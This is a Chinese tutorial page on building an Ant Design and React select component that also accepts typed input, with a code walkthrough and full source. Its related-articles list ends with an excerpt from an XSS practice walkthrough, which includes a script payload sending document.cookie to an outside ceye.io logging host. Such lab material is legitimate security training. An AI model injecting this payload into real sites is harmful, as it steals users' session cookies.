antd+react+可输入的下拉选择组件

该组件是一个可输入的下拉选择组件,支持从预设选项中选择或手动输入自定义值。组件基于 ReactAnt Design 实现,具有良好的交互体验和灵活的配置选项。


🧠 核心逻辑分析

1. 状态管理

const [isInput, setIsInput] = useState(false);
const selectRef = useRef();
const inputFlagRef = useRef();
  • isInput: 控制当前是否处于自定义输入模式。
  • selectRef用于引用 SelectInput 组件,控制焦点。
  • inputFlagRef 用于延迟触发 onBlur 事件,避免误操作。

2. 生命周期控制

useEffect(() => {selectRef.current && selectRef.current?.focus();return () => {if (inputFlagRef.current) {clearTimeout(inputFlagRef.current);}inputFlagRef.current = null;};
}, []);
  • 组件首次挂载时自动聚焦。
  • 组件卸载时清除定时器,防止内存泄漏。
useEffect(() => {if (isInput) {selectRef.current && selectRef.current?.focus();}
}, [isInput]);
  • 当切换到自定义输入模式时,自动聚焦到输入框。

3. 值变更处理

const triggerChange = (val) => {onChange(val);
};
  • 封装 onChange,用于统一处理值变更逻辑。

4. 下拉菜单渲染

const renderDropdownContent = (menu) => {return (<>{menu}<Divider style={{ margin: '8px 0' }} /><div style={{ width: '100%' }}><Buttontype="text"style={{ width: '100%' }}onClick={() => {if (inputFlagRef.current) {clearTimeout(inputFlagRef.current);}inputFlagRef.current = null;setIsInput(true);}}>{defaultTitle}</Button></div></>);
};
  • 在下拉菜单底部添加一个按钮,点击后切换为自定义输入模式。
  • 清除之前的定时器,防止误触发 onBlur

🧱 组件结构详解

自定义输入模式 (isInput === true)

<Inputref={selectRef}placeholder="请输入"{...rest}maxLength={maxLength || 50}value={value}onChange={(ev) => {triggerChange(ev.target.value ?? '');}}onFocus={() => {triggerChange('');}}onBlur={() => {setIsInput(false);rest.onBlur && rest.onBlur();}}
/>
  • 展示 Input 输入框。
  • onFocus 清空当前值,提供更好的输入体验。
  • onChange 实时更新值。
  • onBlur: 失焦后切换回下拉选择模式,并触发外部 onBlur 回调。

下拉选择模式 (isInput === false)

<Selectstyle={{ width: '100%' }}ref={selectRef}{...rest}placeholder="请选择"dropdownRender={renderDropdownContent}{...omit(rest, ['onPressEnter'])}mode="multiple"value={value ? value.split(',') : []}onChange={(val) => {triggerChange(val ? val.join(',') : val);rest.onBlur && rest.onBlur();}}onBlur={() => {inputFlagRef.current = setTimeout(() => {rest.onBlur && rest.onBlur();}, 361);}}
>{options.map((item) => (<Option key={item.value}>{item.label}</Option>))}
</Select>
  • 使用 mode="multiple" 支持多选,返回值为逗号拼接的字符串。
  • value 将字符串值拆分为数组传入 Select
  • onChange将选中的数组值拼接为字符串返回。
  • onBlur: 延迟触发外部 onBlur 回调,避免误操作。

🧪 使用示例

import React, { useRef } from 'react';
import SelectInput from '@/biz-components/SelectInput';const Demo = () => {const [value, setValue] = React.useState('');const selectInputRef = useRef();const options = [{ label: '选项1', value: '1' },{ label: '选项2', value: '2' },{ label: '选项3', value: '3' },];return (<SelectInputref={selectInputRef}value={value}onChange={setValue}options={options}placeholder="请选择或输入"/>);
};

全部代码

import React, { useState, useRef, useEffect } from 'react';
import { Select, Divider, Button, Input } from 'antd';
import { omit } from 'lodash';const { Option } = Select;// eslint-disable-next-line no-unused-vars
const CustomSelectSupportInput = (props, ref) => {const { value, onChange, options = [], defaultTitle = '自定义', maxLength, ...rest } = props;const [isInput, setIsInput] = useState(false);const selectRef = useRef();const inputFlagRef = useRef();useEffect(() => {selectRef.current && selectRef.current?.focus();return () => {if (inputFlagRef.current) {clearTimeout(inputFlagRef.current);}inputFlagRef.current = null;};}, []);useEffect(() => {if (isInput) {selectRef.current && selectRef.current?.focus();}}, [isInput]);const triggerChange = (val) => {onChange(val);};// 下拉项const renderDropdownContent = (menu) => {return (<>{menu}<Divider style={{ margin: '8px 0' }} /><div style={{ width: '100%' }}><Buttontype="text"style={{ width: '100%' }}// onMouseDown={() => {onClick={() => {// inputFlagRef.current = true;if (inputFlagRef.current) {clearTimeout(inputFlagRef.current);}inputFlagRef.current = null;setIsInput(true);}}>{defaultTitle}</Button></div></>);};return (<>{isInput && (<Inputref={selectRef}placeholder="请输入"{...rest}maxLength={maxLength || 50}value={value}onChange={(ev) => {triggerChange(ev.target.value ?? '');}}onFocus={() => {triggerChange('');}}onBlur={() => {setIsInput(false);rest.onBlur && rest.onBlur();}}/>)}{!isInput && (<Selectstyle={{ width: '100%' }}ref={selectRef}{...rest}placeholder="请选择"dropdownRender={renderDropdownContent}{...omit(rest, ['onPressEnter'])}mode="multiple"value={value ? value.split(',') : []}onChange={(val) => {triggerChange(val ? val.join(',') : val);// 变更后主动失焦保存数据,避免直接点击外部的 ‘添加’ 按钮触发失焦,导致行更新数据丢失rest.onBlur && rest.onBlur();}}onBlur={() => {// if (inputFlagRef.current) {//   return;// }inputFlagRef.current = setTimeout(() => {rest.onBlur && rest.onBlur();}, 361);}}>{options.map((item) => (<Option key={item.value}>{item.label}</Option>))}</Select>)}</>);
};export default React.forwardRef(CustomSelectSupportInput);

🧩 扩展建议

  • 可通过 dropdownRender 自定义下拉菜单内容。
  • 可结合 Form.Item 使用,支持表单校验。
  • 可扩展支持远程搜索、自动补全等功能。
  • 可增加 onSearch 回调支持动态搜索选项。

📚 参考文档

  • React
  • Ant Design - Select
  • Lodash - omit

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/bicheng/90180.shtml
繁体地址,请注明出处:http://hk.pswp.cn/bicheng/90180.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

React 面试题库

openAI React 面试题库 以下题库按模块分类&#xff08;React 架构与运行机制、核心 API、Diff 算法与事件机制、Fiber 架构与调度、并发模式与过渡、生命周期及新版生命周期对照、综合源码题、扩展专题、React 与 Vue 对比&#xff09;&#xff0c;并按难度&#xff08;初级…

查看两个tv and 手机模拟器的ip

要查看 Android 模拟器 的 IP 地址&#xff0c;你可以使用 ADB shell 命令来获取。下面是详细步骤&#xff1a;步骤 1&#xff1a;查看已连接的模拟器首先&#xff0c;确保你连接的模拟器已经启动并且连接到 ADB。你可以运行以下命令来查看已连接的设备&#xff1a;adb devices…

从零到一:用C语言构建贪吃蛇(一)- 基础框架与数据结构

资料合集下载链接: ​​https://pan.quark.cn/s/472bbdfcd014​ 第一步:绘制游戏世界 - 定义地图边界 任何游戏都需要一个舞台。在贪吃蛇中,这个舞台就是一个有明确边界的矩形地图。 1. 确定尺寸 根据笔记,我们首先要确定地图的尺寸。使用宏定义(​​#define​​)是…

AWS RDS 排查性能问题

AWS RDS 排查数据库问题 1.查看当前横在执行的SQL select id,user,time,left(info,100) from information_schema.processlist where time>0 and info is not null order by time desc ;2.AWS RDS 查看性能详情查看 Top SQL&#xff0c;AAS最高的几个sql&#xff0c;然后看这…

Baumer工业相机堡盟工业相机如何通过YoloV8深度学习模型实现持械检测(C#代码,UI界面版)

Baumer工业相机堡盟工业相机如何通过YoloV8深度学习模型实现持械检测&#xff08;C#代码&#xff0c;UI界面版&#xff09;工业相机使用YoloV8模型实现持械检测工业相机通过YoloV8模型实现持械检测的技术背景在相机SDK中获取图像转换图像的代码分析工业相机图像转换Bitmap图像格…

在 WPF 启动界面中心加载 GIF 动图

在 WPF 启动界面中心加载 GIF 动图 在 WPF 启动界面中心加载 GIF 动图可以通过多种方式实现。下面我将提供一个完整的解决方案&#xff0c;包括使用第三方库和纯 WPF 实现两种方法。 方法一&#xff1a;使用 WpfAnimatedGif 库&#xff08;推荐&#xff09; 这是最简单可靠的方…

Vue前端路由从入门到精通

目录 第1章:路由的本质与Vue Router的魅力 1.1 什么是前端路由? 1.2 为什么选择Vue Router? 1.3 快速上手:安装与基本配置 1.4 一个小实践:动态欢迎页 第2章:路由配置的进阶玩法 2.1 命名路由:给路由取个名字 2.2 动态路由的深度挖掘 2.3 嵌套路由:页面中的页面…

【Python】SQLAlchemy实现upsert

文章目录✅ 通用思路1. 使用 merge() 方法&#xff08;适用于简单场景&#xff09;2. 使用数据库特定的 UPSERT 功能&#xff08;推荐用于性能和并发安全&#xff09;&#x1f7e2; PostgreSQL: 使用 on_conflict_do_update&#x1f7e1; MySQL: 使用 ON DUPLICATE KEY UPDATE&…

快速入门SwiftUI

SwiftUI的入门难度稍微有点高&#xff0c;但对于比较熟悉Swift的UIKit老手来说阵痛期大概1周以内&#xff0c;两周内能达到UIkit的开发效率&#xff0c;个人总结快速入门路径如下&#xff1a; 第一步 周期&#xff1a;1天 操作&#xff1a;阅读苹果官方demo 目的&#xff1a;…

【n8n教程笔记——工作流Workflow】文本课程(第一阶段)——1、导航编辑器界面(Navigating the editor UI)介绍

https://docs.n8n.io/courses/ 文章目录Navigating the Editor UIGetting startedEditor UI settingsLeft-side panelTop barCanvasNodesFinding nodesAdding nodesNode buttonsSummaryNavigating the Editor UI In this lesson you will learn how to navigate the Editor UI…

【Altium Designer2025】电子设计自动化(EDA)软件——Altium Designer25版保姆级下载安装详细图文教程(附安装包)

今天给大家带来精心编写的Altium Designer2025版下载安装全流程图文指南&#xff0c;涵盖从系统准备到安装使用的完整过程。 教程严格遵循零广告、纯工具向原则&#xff0c;手把手教你如何正确安装并配置好这款强大的软件&#xff0c;让你快速进入电路设计的世界&#xff01; …

智象科技赋能金融、证券行业 IT 运维

一、金融、证券行业 IT 运维现状剖析 金融、证券行业 IT 系统架构极其复杂&#xff0c;业务对时效性和连续性的要求近乎苛刻&#xff0c;同时安全监管严格&#xff0c;这些特点共同催生了诸多运维痛点。 系统架构复杂 &#xff1a;IT 系统包含多个业务系统、数据平台和网络架构…

微信小程序服务端快速对接指南(java版)

背景说明 本文档旨在描述服务端在开发微信小程序时需要对接的小程序接口,以简要的方式描述对接流程、接口文档、使用场景。有些接口需要前后端配合,本文主要描述后端接口,对于前端仅轻轻点过。开发语言为Java,但是对接的思路跟语言没有关系,应该不尽相同; 小程序上手路线…

微信小程序入门实例_____从零开始 开发一个“旅行清单 ”微信小程序

前面的博文中。我们陆续学习与开发了记账等一些实用实用小程序的开发过程&#xff0c;今天来打造一个适合出行场景的工具 ——“旅行清单小程序”。无论是短途游玩还是长途旅行&#xff0c;它都能帮你梳理需要携带的物品&#xff0c;避免遗漏。下面就跟着步骤&#xff0c;一步步…

MySQL主从同步集群(Docker搭建)

以下笔记都是基于黑马程序员的面试题写的&#xff1a; Mysql定位慢查询-CSDN博客 Mysql索引-CSDN博客 MySQL事物相关-CSDN博客 MySQL主从同步集群&#xff08;Docker搭建&#xff09;-CSDN博客 MySQL相关面试问题总结-CSDN博客 主从同步&#xff08;Master-Slave Replicat…

NISP-PTE基础实操——XSS

pteXSS模拟1 <script> var img document.createElement("img");img.src"http://xxxxx.ceye.io/log?"escape(document.coo kie);document.body.appendChild(img); </script> 重放加Cookie头 pteXSS模拟2 <script type"text/javasc…

基于网络爬虫的在线医疗咨询数据爬取与医疗服务分析系统,技术采用django+朴素贝叶斯算法+boostrap+echart可视化

摘要 为了发挥互联网医疗问询服务平台在客观衡量医疗服务质量、进一步分析和挖掘网民评论数据方面的作用&#xff0c;本文完成了互联网医疗问询数据抓取与医疗服务质量服务分析平台的主要模块应用&#xff0c;如用户登录注册、医疗服务质量数据分析与信息可视化以及用户情绪识别…

【备忘录】Ubuntu 配置 NFS

安装 NFSsudo apt-get install nfs-kernel-server rpcbind启动 NFSsudo systemctl start nfs-server查看 NFSsudo service nfs-server status

【coze扣子】第1篇:coze快速入门

文章目录coze扣子Coze优点Coze智能体快速入门1、登录进入到个人主页2、创建智能体3、智能体组成部分4、智能体的发布人设与回复逻辑LLM模型配置模型设置生成多样性(抽象程度)Top P&#xff08;话痨程度&#xff09;重复语句惩罚携带上下文轮数最大回复长度技能插件触发器定时触…

PyCharm 入门指南:起步学习、开发环境一体

PyCharm 入门指南一、前置准备&#xff1a;为什么选择 PyCharm&#xff1f; 对于 Python 初学者&#xff0c;PyCharm 是最友好的集成开发环境&#xff08;IDE&#xff09;之一。它通过智能代码提示、自动纠错、调试工具、版本控制集成等功能&#xff0c;大幅降低开发门槛。本文…